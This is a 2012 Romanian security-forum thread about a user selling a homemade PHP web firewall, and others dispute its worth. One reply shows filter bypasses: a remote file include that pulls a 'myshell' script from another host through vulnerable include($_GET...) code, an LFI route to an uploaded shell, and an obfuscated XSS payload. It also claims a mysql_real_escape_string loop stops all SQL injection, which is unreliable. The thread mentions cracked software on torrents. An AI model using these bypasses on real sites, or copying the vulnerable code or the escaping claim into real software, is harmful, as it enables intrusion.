FirewallMake Posted March 3, 2012 Report Posted March 3, 2012 (edited) Acest firewall este creat in PHP. Detine: Securitate impotriva atac-urilor SQLI, XSS , LFI , RFI etc.Securitate impotriva: Proxy , Tor.Status: Total Atac-uri blocate.Total IP-uri blocate.Total flood-uri blocate.Total Bad-Referer blocate.Total Proxy-uri blocate.Total Bad U.Agents blocate.Total Foldere/Fisiere cautate blocate.Imagini: Detalii la id: shadow.white0@ymail.com Edited March 4, 2012 by FirewallMake Quote
rukov Posted March 5, 2012 Report Posted March 5, 2012 un video demo se poate? si pretul cred ca nu e secret Quote
zawhitehacker Posted March 5, 2012 Report Posted March 5, 2012 Bla bla bla..., Barracuda Web Application Firewall - Web Application Protection Against Hackers and VulnerabilitiesEste mai bun ca asta de 10 mii de ori ( se gaseste crackuit pe aproximativ orice torrent ). Quote
Zack Posted March 5, 2012 Report Posted March 5, 2012 Bla bla bla..., Barracuda Web Application Firewall - Web Application Protection Against Hackers and VulnerabilitiesEste mai bun ca asta de 10 mii de ori ( se gaseste crackuit pe aproximativ orice torrent ).Ce ma enerveaza ratati ca tine.Lasa naiba sa isi vanda aplicatia.Eventual puteai sa iti faci alt topic nu sa dai reply aici. Quote
blech Posted March 5, 2012 Report Posted March 5, 2012 da-ne un video te rog frumos cu el in actiune...sper sa nu ma usture ochii de ce-o sa vad. Quote
alexu Posted March 5, 2012 Report Posted March 5, 2012 +1 Romanul trebuie , in general , sa se bage , sa-i strice treaba celuilalt . Atata rautate, invidie nu vezi la altii . Bafta cu vanzarea ! Quote
zawhitehacker Posted March 5, 2012 Report Posted March 5, 2012 Ce ma enerveaza ratati ca tine.Lasa naiba sa isi vanda aplicatia.Eventual puteai sa iti faci alt topic nu sa dai reply aici.Pe bune? Pai de ce sa il las ma când el vrea sa intepe lumea cu un firewall care se g?se?te si gratuit Quote
123vlad Posted March 5, 2012 Report Posted March 5, 2012 (edited) .... Edited December 8, 2014 by 123vlad Quote
alexu Posted March 5, 2012 Report Posted March 5, 2012 Pe bune? Pai de ce sa il las ma când el vrea sa intepe lumea cu un firewall care se g?se?te si gratuitNu tepuieste pe nimeni , cu nimic, atat timp cat este facut de el .E ca si cum ai spune ca lumea care cumpara programe anti-virus , isi ia teapa pentru ca exista si variante free. E o gandire limitata .Sau alt exemplu : daca s-ar spune ca tu ai IQ-ul unui gandac , inseamna ca lumea isi ia teapa pentru ca te lasa sa respiri , deoarece sunt oameni mai inteligenti in lumea asta ? Respecta munca omului ! Quote
FirewallMake Posted March 5, 2012 Author Report Posted March 5, 2012 O sa revin curand cu un video + demo pentru voi Si pentru cei care au postat firewall-urile alea. Nu sunt nici macar 5% din firewall-ul meu. Multumesc ca mi-ati distrus afacerea dar nu ma dau batut si o sa revin cu un demo + video curand Quote
Vlachs Posted March 5, 2012 Report Posted March 5, 2012 Hai sa fim seriosi!Securitate impotriva proxy , Tor, probabil vrei sa spui ca detectezi proxy-urile si conexiunile prin tor, ar trebui sa specifici metoda cum verifici daca este proxy(verificand porturile comune, daca face forward), nu cred ca ai rata de succes peste 30% !Protectie impotriva - SQLI, XSS , LFI , RFI etc, poti sa o faci pe baza de pattern-uri, nu cred ca ai tu toate pattern-urile pentru fiecare atac sau ca reusesti sa filtrezi corect toate valorile trimise!DOS/DDOS nu ai cum sa blochezi, poti doar sa reduci efectele oferind continut putin si static!Nu as recomanda cuiva sa foloseasca un firewall web facut de o persona necunoscuta, e posibil sa va futeti de tot site-urile! Quote
Xander Posted March 5, 2012 Report Posted March 5, 2012 merge sau nu... macar omu incearca sa ofere un produs facut de el in care a bagat ceva munca am vrut si eu sa fac ceva de genul in trecut dar cred ca este prea ne realist cat despre protectie sqli/xss/lfi/rfi cu patternuri... yeah right! nu zic nu... merge pana apar alte metode care trec de patternurile alea exemple:LFI:.htaccess: RewriteRule ^(.*)\.html$ $1.phpbad:http://example.php/images/unshell.htmlRFI:<?phpinclude($_GET['folder'] . "/" . $_GET['fisier'] . ".php");http://example.com/?folder=http://www.example2.com/&fisier=myshellxss:test.php:<?php echo "<script>" . $_GET['c'] . "</script>" ;?> ( am pus cod aiurea ca sa demonstrez o idee )http://example.com/?c=omg='a' + 'l' + 'e' + 'r' + 't' + '(mda);' ( bine exemplul nu o sa mearga daca plusurile si egalul nu sunt url encoded dar asta e irelevant )la sqli se poate face ceva ... relativ usor:introduci in fiecare script ... la inceput$source = array("_POST" , "_GET" , "_COOKIE");foreach($source as $ga){ $_ga = &$$ga; foreach($$ga as $key => $val) { $_ga[$key] = mysql_real_escape_string($val); }}singura problema reala cu codul de mai sus este ca trebuie sa te conectezi la mysql inainte de a rula codul in rest... nu cred ca se poate face sqli daca ai codul asta Quote
